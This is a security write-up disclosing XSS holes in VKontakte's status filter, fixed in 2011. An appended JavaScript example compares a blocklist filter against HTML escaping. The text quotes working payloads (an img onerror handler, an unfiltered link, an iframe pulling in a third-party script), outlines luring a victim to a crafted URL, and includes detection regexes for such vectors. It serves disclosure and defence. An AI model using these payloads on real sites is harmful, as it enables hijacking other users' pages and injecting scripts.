A short while ago, I decided to prepare a presentation on web vulnerabilities, and specifically on XSS attacks. This involved studying the way today's filtering systems work.
I selected the most popular Russian social networking website, VKontakte.ru, as a test bed. One thing that grabbed my attention was the updated user status system.
The HTML code in the part of the page where users edit their status messages is shown below:
As you can see, filtering is performed by the infoCheck() function. The status itself is located in this string:
What we have here is two-step filtering. The first step is performed when the user enters the status message. The second step involves converting the status message to text and returning it to the page in the form in which other users will see it.
While the second step definitely works well and it would clearly be impossible to turn it into active (stored) XSS, things are not as simple where the first step is concerned, so it is that step that we will look at in greater detail.
Predictably, the simple <script>alert()</script> did not work, and the status remained empty. Other 'script-like' attempts didn't work either: it seems that this particular string is explicitly filtered.
However, the <script> tag is not essential for a script to be executed. The first vulnerability is triggered on the user's machine by using the <img> tag: by entering the string <img src=1.gif onerror=some_function> as the user's status, we can get that function executed, because the onerror handler fires as soon as the browser fails to load the non-existent image 1.gif. For example, we can call the function profile.infoSave(), which the page normally calls with an empty parameter to clear the status, but pass a parameter of our choice. Thus, if we enter <img src=1.gif onerror=profile.infoSave('XSS')>, we get the string "XSS" as our status message:
Another interesting vulnerability associated with the filter is that the <A> tag is not filtered. If we enter <A HREF="//www.google.com/">XSS</A> as our status, we get... a hyperlink: clicking on it brings up a status editing window and, a second later, opens google.com.
As we all remember, XSS stands for cross-site scripting, so I decided to test the next vulnerability using a third-party website with a script loaded on it. In addition to the tags mentioned above not being filtered, the <iframe> tag also successfully passed the filter. As a result, entering <iframe src="yoursite.com" width="100%" height="300"> in the status line will produce an iframe which loads the third-party page and, with it, the script hosted there. Below is an example of what the iframe can look like:
This is a more serious vulnerability than the other two. One way of exploiting it is to craft a URL that changes the user's status and send it to the victim in the hope that they will click on it. The script is executed on the user's page even before the status message is published. This is a classic example of passive (reflected) XSS.
These vulnerabilities existed from 01 August 2010, when the new user status system was introduced. We notified VKontakte's management on 01 March 2011 and the vulnerabilities were closed on 03 March.
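As an added example (not code from the original post and not VKontakte's actual infoCheck()), the following JavaScript reconstructs, as an assumption, the kind of blocklist filter the post describes, i.e. one that only drops a status containing a <script> tag, and runs the post's own payloads through it. It also shows which script-carrying constructs survive such a filter and what the same input looks like after HTML-escaping, which is the appropriate fix for a field that should only ever hold plain text. The function names and the vector-detection regexes are mine, not the site's.

```javascript
// Added example: not code from the original post and not VKontakte's real
// infoCheck(). blocklistFilter() is an ASSUMED reconstruction of the first
// filtering step as the post describes it (a status containing <script> is
// dropped, anything else passes). The payloads are the ones quoted in the post.

// Assumed reconstruction of the first filtering step.
function blocklistFilter(status) {
  return /<\s*\/?\s*script\b/i.test(status) ? "" : status;
}

// Vectors a <script>-only blocklist misses. Returns the names of those found.
// This is a test helper for probing a filter, not a sanitiser in its own right.
function findScriptVectors(html) {
  const found = [];
  // Any tag carrying an on*= attribute (onerror, onload, onmouseover, ...).
  if (/<[a-z][^>]*\son[a-z]+\s*=/i.test(html)) found.push("event handler attribute");
  if (/<\s*iframe\b/i.test(html)) found.push("iframe");
  if (/<\s*a\b[^>]*\shref\s*=/i.test(html)) found.push("hyperlink");
  if (/javascript\s*:/i.test(html)) found.push("javascript: URL");
  return found;
}

// Hardened alternative for a plain-text status field: encode the HTML
// metacharacters so the browser renders the status as text, never as markup.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// The payloads quoted in the post.
const PAYLOADS = [
  "<script>alert()</script>",
  "<img src=1.gif onerror=profile.infoSave('XSS')>",
  '<A HREF="//www.google.com/">XSS</A>',
  '<iframe src="yoursite.com" width="100%" height="300">',
];

// Run every payload through both approaches and report what survives.
function compareFilters(payloads = PAYLOADS) {
  return payloads.map((payload) => {
    const afterBlocklist = blocklistFilter(payload);
    return {
      payload,
      afterBlocklist,
      survivingVectors: findScriptVectors(afterBlocklist),
      escaped: escapeHtml(payload),
    };
  });
}

console.table(compareFilters());
```

Run it with node: the table shows that only the <script> payload is stopped by the blocklist, while the img, link and iframe payloads pass through untouched and each still carries an executable vector. Escaping removes the vectors for all four inputs because the browser never sees a tag at all. A regex detector like findScriptVectors() is handy for testing a filter but is not a safe sanitiser; the robust choices are output encoding for plain-text fields or an allowlist-based HTML sanitiser where rich text is genuinely required.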
News Source: Alexander Antukh
Kaspersky Lab Expert